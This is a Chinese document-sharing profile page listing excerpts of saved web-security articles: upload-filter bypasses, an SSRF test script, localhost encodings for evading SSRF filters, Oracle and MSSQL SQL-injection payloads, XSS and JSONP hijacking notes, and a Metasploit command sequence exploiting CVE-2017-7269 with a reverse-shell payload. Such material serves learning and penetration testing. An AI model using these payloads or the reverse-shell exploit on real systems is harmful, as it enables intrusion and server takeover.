zZ华 IP属地:广东

文章 关注 粉丝 访问 贡献
 
共 72 篇文章
显示摘要每页显示  条
filename=''''''''a.php'''''''' 去除form-data Content-Disposition: AAAAAAAA=''''''''BBBBBBBB''''''''; name=''''''''file''''''''...
写一个1.php文件功能是接受url,并将它给一个变量,然后打印出来<?php$url=$_GET[''''''''url''''''''];$content=file_get_contents($url);echo $content;?>356关源码分析操作url=http://0/flag.php.只能加载外部地址,所以我们在自己的云服务器上进行重定向服务器操作服...
根据攻击类型和漏洞执行的不同,XSS漏洞主要分为以下三种类型:反射型XSS(Reflected XSS)、存储型XSS(Stored XSS)、DOM型XSS(DOM-based XSS)。3、DOM型XSS:DOM型XSS漏洞发生在浏览器的客户端,而不是在服务器上。本文从安全攻防的角度针对常见WEB漏洞的原理和防护措施进行了总结,涵盖SQL注入、XSS漏洞、文件上传、CSRF漏洞、SSRF漏洞等...
Oracle使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录。1'''''''' and 1=ctxsys.drithsx.sn(1,(select user from dual))--CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))an...
1 http://0.0.0.0/http://0/http://127.0.0.1 http://localhost http://127.255.255.254 127.0.0.1 - 127.255.255.254 http://[::1] http://[::ffff:7f00:1] http://[::ffff:127.0.0.1] http://127.1 http://127.0.1 http://0:80.尝试使用不同的URL编码方法,如字符编码,双重编码等,绕过输入验证和过滤对请求得内部地址进行URL编码或者二次URL编...
所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可以查看所有数据库,还可以对服务器文件进行读写操作。mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,User表:存放用户账户信息以及全局级别(所有数据库)权限,决定了来自哪些主机的哪些用户可以访问...
msfconsolesearch cve-2017-7269use exploit/windows/iis/cve-2017-7269set payload windows/meterpreter/reverse_tcpshow optionsset rhost 192.168.1.10set lhost 192.168.1.100show optionsrunshell.msf > use exploit/multi/handlermsf exploit(handler) >set payload windows/meterpreter/reverse_tcpmsf exploit(handler) >set ...
结合近几年披露的与越权相关的 Web 应用通用漏洞披露(Common Vulnerability and Exposures,CVE)漏洞,通过分析 Web 越权漏洞成因和常见攻击方法,提出了针对 Web 越权漏洞攻击的防范方法。常见的漏洞有结构化查询语言(Structured Query Language,SQL)注入漏洞、跨站脚本漏洞(Cross Site Script,XSS)、跨站请求伪造漏洞(Cross Site Re...
有些函数与Mysql的类似就不过多介绍了,不过要注意的是MSSQL 数据库是强类型语言数据库,当类型不一致时将会报错。asp、.net:mssqlphp:mysql、postgresqljava:oracle、mysqliis:mssqlapache:mysql、postgresql。在使用盲注的时候,会经常用到 substr() 、substring() 、mid() 等函数。如果在测试过程中发现substr()函数被拦截则可以尝试用...
JSONP跨域漏洞主要是callback自定义导致的XSS和JSONP劫持。我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。<html><head> <title>lol</title> <meta charset=''''''''utf-8'''&#...
帮助 | 留言交流 | 联系我们 | 服务条款 | 下载网文摘手 | 下载手机客户端
北京六智信息技术股份有限公司 Copyright© 2005-2024 360doc.com , All Rights Reserved
京ICP证090625号 京ICP备05038915号 京网文[2016]6433-853号 京公网安备11010502030377号
返回
顶部